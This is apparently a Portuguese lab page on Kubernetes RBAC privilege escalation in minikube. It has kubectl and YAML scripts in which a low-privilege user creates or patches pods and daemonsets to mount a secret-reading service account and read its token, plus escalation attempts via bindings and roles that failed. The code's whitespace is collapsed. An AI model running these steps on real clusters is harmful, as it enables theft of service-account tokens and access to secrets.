Você pode executar esses laboratórios apenas dentro do minikube.
Criação de Pod -> Escalar para SAs de ns
Vamos criar:
Uma conta de serviço "test-sa" com privilégio de cluster para ler segredos
Um ClusterRole "test-cr" e um ClusterRoleBinding "test-crb" serão criados
Permissões para listar e criar pods para um usuário chamado "Test" serão concedidas
Um Role "test-r" e RoleBinding "test-rb" serão criados
Em seguida, vamos confirmar que a SA pode listar segredos e que o usuário Test pode listar pods
Finalmente, vamos impersonar o usuário Test para criar um pod que inclui a SA test-sa e roubar o token da conta de serviço.
Esta é a maneira de mostrar que o usuário poderia escalar privilégios dessa forma
Para criar o cenário, uma conta de administrador é usada.
Além disso, para exfiltrar o token da sa neste exemplo, a conta de administrador é usada para executar dentro do pod criado. No entanto, como explicado aqui, a declaração do pod poderia conter a exfiltração do token, então o privilégio de "exec" não é necessário para exfiltrar o token, a permissão de "criar" é suficiente.
# Create Service Account test-sa# Create role and rolebinding to give list and create permissions over pods in default namespace to user Test# Create clusterrole and clusterrolebinding to give the SA test-sa access to secrets everywhereecho'apiVersion: v1kind: ServiceAccountmetadata:name: test-sa---kind: RoleapiVersion: rbac.authorization.k8s.io/v1metadata:name: test-rrules:- apiGroups: [""]resources: ["pods"]verbs: ["get", "list", "delete", "patch", "create"]---apiVersion: rbac.authorization.k8s.io/v1kind: RoleBindingmetadata:name: test-rbsubjects:- kind: ServiceAccountname: test-sa- kind: Username: TestroleRef:kind: Rolename: test-rapiGroup: rbac.authorization.k8s.io---kind: ClusterRoleapiVersion: rbac.authorization.k8s.io/v1metadata:name: test-crrules:- apiGroups: [""]resources: ["secrets"]verbs: ["get", "list", "delete", "patch", "create"]---apiVersion: rbac.authorization.k8s.io/v1kind: ClusterRoleBindingmetadata:name: test-crbsubjects:- kind: ServiceAccountnamespace: defaultname: test-saapiGroup: ""roleRef:kind: ClusterRolename: test-crapiGroup: rbac.authorization.k8s.io'|kubectlapply-f-# Check test-sa can access kube-system secretskubectl--assystem:serviceaccount:default:test-sa-nkube-systemgetsecrets# Check user User can get pods in namespace defaultkubectl--asTest-ndefaultgetpods# Create a pod as user Test with the SA test-sa (privesc step)echo"apiVersion: v1kind: Podmetadata:name: test-podnamespace: defaultspec:containers:- name: alpineimage: alpinecommand: ['/bin/sh']args: ['-c', 'sleep 100000']serviceAccountName: test-saautomountServiceAccountToken: truehostNetwork: true"|kubectl--asTestapply-f-# Connect to the pod created an confirm the attached SA token belongs to test-sakubectlexec-ti-ndefaulttest-pod--cat/var/run/secrets/kubernetes.io/serviceaccount/token|cut-d"."-f2|base64-d# Clean the scenariokubectldeletepodtest-podkubectldeleteclusterrolebindingtest-crbkubectldeleteclusterroletest-crkubectldeleterolebindingtest-rbkubectldeleteroletest-rkubectldeleteserviceaccounttest-sa
Criar Daemonset
# Create Service Account test-sa# Create role and rolebinding to give list & create permissions over daemonsets in default namespace to user Test# Create clusterrole and clusterrolebinding to give the SA test-sa access to secrets everywhereecho'apiVersion: v1kind: ServiceAccountmetadata:name: test-sa---kind: RoleapiVersion: rbac.authorization.k8s.io/v1metadata:name: test-rrules:- apiGroups: ["apps"]resources: ["daemonsets"]verbs: ["get", "list", "create"]---apiVersion: rbac.authorization.k8s.io/v1kind: RoleBindingmetadata:name: test-rbsubjects:- kind: Username: TestroleRef:kind: Rolename: test-rapiGroup: rbac.authorization.k8s.io---kind: ClusterRoleapiVersion: rbac.authorization.k8s.io/v1metadata:name: test-crrules:- apiGroups: [""]resources: ["secrets"]verbs: ["get", "list", "delete", "patch", "create"]---apiVersion: rbac.authorization.k8s.io/v1kind: ClusterRoleBindingmetadata:name: test-crbsubjects:- kind: ServiceAccountnamespace: defaultname: test-saapiGroup: ""roleRef:kind: ClusterRolename: test-crapiGroup: rbac.authorization.k8s.io'|kubectlapply-f-# Check test-sa can access kube-system secretskubectl--assystem:serviceaccount:default:test-sa-nkube-systemgetsecrets# Check user User can get pods in namespace defaultkubectl--asTest-ndefaultgetdaemonsets# Create a daemonset as user Test with the SA test-sa (privesc step)echo"apiVersion: apps/v1kind: DaemonSetmetadata:name: alpinenamespace: defaultspec:selector:matchLabels:name: alpinetemplate:metadata:labels:name: alpinespec:serviceAccountName: test-saautomountServiceAccountToken: truehostNetwork: truecontainers:- name: alpineimage: alpinecommand: ['/bin/sh']args: ['-c', 'sleep 100000']"|kubectl--asTestapply-f-# Connect to the pod created an confirm the attached SA token belongs to test-sakubectlexec-ti-ndefaultdaemonset.apps/alpine--cat/var/run/secrets/kubernetes.io/serviceaccount/token|cut-d"."-f2|base64-d# Clean the scenariokubectldeletedaemonsetalpinekubectldeleteclusterrolebindingtest-crbkubectldeleteclusterroletest-crkubectldeleterolebindingtest-rbkubectldeleteroletest-rkubectldeleteserviceaccounttest-sa
Patch Daemonset
Neste caso, vamos patchar um daemonset para fazer com que seu pod carregue nossa conta de serviço desejada.
Se seu usuário tiver o verbo update em vez de patch, isso não funcionará.
# Create Service Account test-sa# Create role and rolebinding to give list & update patch permissions over daemonsets in default namespace to user Test# Create clusterrole and clusterrolebinding to give the SA test-sa access to secrets everywhereecho'apiVersion: v1kind: ServiceAccountmetadata:name: test-sa---kind: RoleapiVersion: rbac.authorization.k8s.io/v1metadata:name: test-rrules:- apiGroups: ["apps"]resources: ["daemonsets"]verbs: ["get", "list", "patch"]---apiVersion: rbac.authorization.k8s.io/v1kind: RoleBindingmetadata:name: test-rbsubjects:- kind: Username: TestroleRef:kind: Rolename: test-rapiGroup: rbac.authorization.k8s.io---kind: ClusterRoleapiVersion: rbac.authorization.k8s.io/v1metadata:name: test-crrules:- apiGroups: [""]resources: ["secrets"]verbs: ["get", "list", "delete", "patch", "create"]---apiVersion: rbac.authorization.k8s.io/v1kind: ClusterRoleBindingmetadata:name: test-crbsubjects:- kind: ServiceAccountnamespace: defaultname: test-saapiGroup: ""roleRef:kind: ClusterRolename: test-crapiGroup: rbac.authorization.k8s.io---apiVersion: apps/v1kind: DaemonSetmetadata:name: alpinenamespace: defaultspec:selector:matchLabels:name: alpinetemplate:metadata:labels:name: alpinespec:automountServiceAccountToken: falsehostNetwork: truecontainers:- name: alpineimage: alpinecommand: ['/bin/sh']args: ['-c', 'sleep100']'|kubectlapply-f-# Check user User can get pods in namespace defaultkubectl--asTest-ndefaultgetdaemonsets# Create a daemonset as user Test with the SA test-sa (privesc step)echo"apiVersion: apps/v1kind: DaemonSetmetadata:name: alpinenamespace: defaultspec:selector:matchLabels:name: alpinetemplate:metadata:labels:name: alpinespec:serviceAccountName: test-saautomountServiceAccountToken: truehostNetwork: truecontainers:- name: alpineimage: alpinecommand: ['/bin/sh']args: ['-c', 'sleep 100000']"|kubectl--asTestapply-f-# Connect to the pod created an confirm the attached SA token belongs to test-sakubectlexec-ti-ndefaultdaemonset.apps/alpine--cat/var/run/secrets/kubernetes.io/serviceaccount/token|cut-d"."-f2|base64-d# Clean the scenariokubectldeletedaemonsetalpinekubectldeleteclusterrolebindingtest-crbkubectldeleteclusterroletest-crkubectldeleterolebindingtest-rbkubectldeleteroletest-rkubectldeleteserviceaccounttest-sa
Não funciona
Criar/Patch Bindings
Não funciona:
Criar um novo RoleBinding apenas com o verbo create
Criar um novo RoleBinding apenas com o verbo patch (você precisa ter as permissões de binding)
Você não pode fazer isso para atribuir o papel a si mesmo ou a um SA diferente
Modificar um novo RoleBinding apenas com o verbo patch (você precisa ter as permissões de binding)
Você não pode fazer isso para atribuir o papel a si mesmo ou a um SA diferente
echo'apiVersion: v1kind: ServiceAccountmetadata:name: test-sa---apiVersion: v1kind: ServiceAccountmetadata:name: test-sa2---kind: RoleapiVersion: rbac.authorization.k8s.io/v1metadata:name: test-rrules:- apiGroups: ["rbac.authorization.k8s.io"]resources: ["rolebindings"]verbs: ["get", "patch"]---apiVersion: rbac.authorization.k8s.io/v1kind: RoleBindingmetadata:name: test-rbsubjects:- kind: Username: TestroleRef:kind: Rolename: test-rapiGroup: rbac.authorization.k8s.io---kind: RoleapiVersion: rbac.authorization.k8s.io/v1metadata:name: test-r2rules:- apiGroups: [""]resources: ["pods"]verbs: ["get", "list", "delete", "patch", "create"]---apiVersion: rbac.authorization.k8s.io/v1kind: RoleBindingmetadata:name: test-rb2subjects:- kind: ServiceAccountname: test-saapiGroup: ""roleRef:kind: Rolename: test-r2apiGroup: rbac.authorization.k8s.io'|kubectlapply-f-# Create a pod as user Test with the SA test-sa (privesc step)echo"apiVersion: rbac.authorization.k8s.io/v1kind: RoleBindingmetadata:name: test-r2subjects:- kind: ServiceAccountname: test-sa2apiGroup: ""roleRef:kind: Rolename: test-r2apiGroup: rbac.authorization.k8s.io"|kubectl--asTestapply-f-# Connect to the pod created an confirm the attached SA token belongs to test-sakubectlexec-ti-ndefaulttest-pod--cat/var/run/secrets/kubernetes.io/serviceaccount/token|cut-d"."-f2|base64-d# Clean the scenariokubectldeleterolebindingtest-rbkubectldeleterolebindingtest-rb2kubectldeleteroletest-rkubectldeleteroletest-r2kubectldeleteserviceaccounttest-sakubectldeleteserviceaccounttest-sa2
Bind explicitly Bindings
Na seção "Prevenção de Escalação de Privilégios e Inicialização" de https://unofficial-kubernetes.readthedocs.io/en/latest/admin/authorization/rbac/ é mencionado que se um SA pode criar um Binding e tem permissões de Bind explícitas sobre o Role/Cluster role, ele pode criar bindings mesmo usando Roles/ClusterRoles com permissões que não possui.
No entanto, não funcionou para mim:
# Create 2 SAs, give one of them permissions to create clusterrolebindings# and bind permissions over the ClusterRole "admin"echo 'apiVersion:v1kind:ServiceAccountmetadata:name:test-sa---apiVersion:v1kind:ServiceAccountmetadata:name:test-sa2---kind:ClusterRoleapiVersion:rbac.authorization.k8s.io/v1metadata:name:test-crrules:- apiGroups: ["rbac.authorization.k8s.io"]resources: ["clusterrolebindings"]verbs: ["get","create"]- apiGroups: ["rbac.authorization.k8s.io/v1"]resources: ["clusterroles"]verbs: ["bind"]resourceNames: ["admin"]---apiVersion:rbac.authorization.k8s.io/v1kind:ClusterRoleBindingmetadata:name:test-crbsubjects:- kind:ServiceAccountname:test-sanamespace:defaultroleRef:kind:ClusterRolename:test-crapiGroup:rbac.authorization.k8s.io' | kubectl apply -f -# Try to bind the ClusterRole "admin" with the second SA (won't work)echo 'apiVersion:rbac.authorization.k8s.io/v1kind:ClusterRoleBindingmetadata:name:test-crb2subjects:- kind:ServiceAccountname:test-sa2namespace:defaultroleRef:kind:ClusterRolename:adminapiGroup:rbac.authorization.k8s.io' | kubectl --as system:serviceaccount:default:test-sa apply -f -# Clean environmentkubectl delete clusterrolebindings test-crbkubectl delete clusterrolebindings test-crb2kubectl delete clusterrole test-crkubectl delete serviceaccount test-sakubectl delete serviceaccount test-sa
# Like the previous example, but in this case we try to use RoleBindings# instead of CLusterRoleBindingsecho 'apiVersion:v1kind:ServiceAccountmetadata:name:test-sa---apiVersion:v1kind:ServiceAccountmetadata:name:test-sa2---kind:ClusterRoleapiVersion:rbac.authorization.k8s.io/v1metadata:name:test-crrules:- apiGroups: ["rbac.authorization.k8s.io"]resources: ["clusterrolebindings"]verbs: ["get","create"]- apiGroups: ["rbac.authorization.k8s.io"]resources: ["rolebindings"]verbs: ["get","create"]- apiGroups: ["rbac.authorization.k8s.io/v1"]resources: ["clusterroles"]verbs: ["bind"]resourceNames: ["admin","edit","view"]---apiVersion:rbac.authorization.k8s.io/v1kind:RoleBindingmetadata:name:test-rbnamespace:defaultsubjects:- kind:ServiceAccountname:test-sanamespace:defaultroleRef:kind:ClusterRolename:test-crapiGroup:rbac.authorization.k8s.io' | kubectl apply -f -# Won't workecho 'apiVersion:rbac.authorization.k8s.io/v1kind:RoleBindingmetadata:name:test-rb2namespace:defaultsubjects:- kind:ServiceAccountname:test-sa2namespace:defaultroleRef:kind:ClusterRolename:adminapiGroup:rbac.authorization.k8s.io' | kubectl --as system:serviceaccount:default:test-sa apply -f -# Clean environmentkubectl delete rolebindings test-rbkubectl delete rolebindings test-rb2kubectl delete clusterrole test-crkubectl delete serviceaccount test-sakubectl delete serviceaccount test-sa2
Criação de papéis arbitrários
Neste exemplo, tentamos criar um papel com as permissões de criar e acessar os recursos de papéis. No entanto, o K8s nos impede de criar um papel com mais permissões do que o principal que está criando possui:
# Create a SA and give the permissions "create" and "patch" over "roles"echo 'apiVersion:v1kind:ServiceAccountmetadata:name:test-sa---kind:RoleapiVersion:rbac.authorization.k8s.io/v1metadata:name:test-rrules:- apiGroups: ["rbac.authorization.k8s.io"]resources: ["roles"]verbs: ["patch","create","get"]---apiVersion:rbac.authorization.k8s.io/v1kind:RoleBindingmetadata:name:test-rbsubjects:- kind:ServiceAccountname:test-saroleRef:kind:Rolename:test-rapiGroup:rbac.authorization.k8s.io' | kubectl apply -f -# Try to create a role over all the resources with "create" and "patch"# This won't wotrkecho 'kind:RoleapiVersion:rbac.authorization.k8s.io/v1metadata:name:test-r2rules:- apiGroups: [""]resources: ["*"]verbs: ["patch","create"]' | kubectl --as system:serviceaccount:default:test-sa apply -f-# Clean the environmentkubectl delete rolebinding test-rbkubectl delete role test-rkubectl delete role test-r2kubectl delete serviceaccount test-sa